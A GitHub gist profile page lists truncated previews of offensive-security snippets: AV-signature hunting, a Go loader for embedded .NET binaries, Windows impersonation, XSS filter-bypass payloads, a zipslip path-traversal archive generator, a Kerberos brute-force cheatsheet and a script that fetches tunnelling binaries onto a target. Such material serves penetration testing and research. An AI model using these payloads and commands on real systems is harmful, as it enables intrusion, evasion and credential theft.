Skip to content

Instantly share code, notes, and snippets.

View xct's full-sized avatar

xct xct

View GitHub Profile
function Install-WinDbg {
[switch] $Start
# Change default progress preference (faster downloads)
$DefaultProgressPreference = $ProgressPreference
$ProgressPreference = 'SilentlyContinue'
Write-Host "Downloading windbg.appinstaller (XML manifest file)"
xct / Find-AVSignature.ps1
Created December 16, 2020 07:04
function Find-AVSignature {
Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
License: BSD 3-Clause
xct / go-sharp-loader.go
Created August 6, 2020 10:07 — forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
package main
Example Go program with multiple .NET Binaries embedded
This requires packr ( and the utility. Install with:
$ go get -u
Place all your EXEs are in a "binaries" folder
using NtApiDotNet;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
xct / impersonate.go
Created April 22, 2020 17:03 — forked from kostix/impersonate.go
A demonstration example for
// A demonstration example for
// It runs a goroutine locked to an OS thread on Windows
// then impersonates that thread as another user using its name
// and plaintext password, then reverts to the default security
// context before detaching from its OS thread.
package main
import (
xct / xxsfilterbypass.lst
Created August 20, 2019 16:34 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
xct /
Last active August 5, 2021 10:16
Creates zips with relative paths ("zipslip")
#!/usr/bin/env python
import zipfile
import sys
import os
python root.txt ../../../../..
Added ../../../../../root.txt to
xct /
Created June 23, 2019 11:57 — forked from TarlogicSecurity/
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet



python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

xct /
Last active June 19, 2019 08:37
Deploy ssf to a windows or linux target & run


param([string]$addr, [string]$port)
wget "http://${addr}:${port}/ssf.exe" -o "ssf.exe"
wget "http://${addr}:${port}/ssfd.exe" -o "ssfd.exe"
mkdir certs
cd certs
wget "http://${addr}:${port}/certs/certificate.crt" -o "certificate.crt"
wget "http://${addr}:${port}/certs/dh4096.pem" -o "dh4096.pem"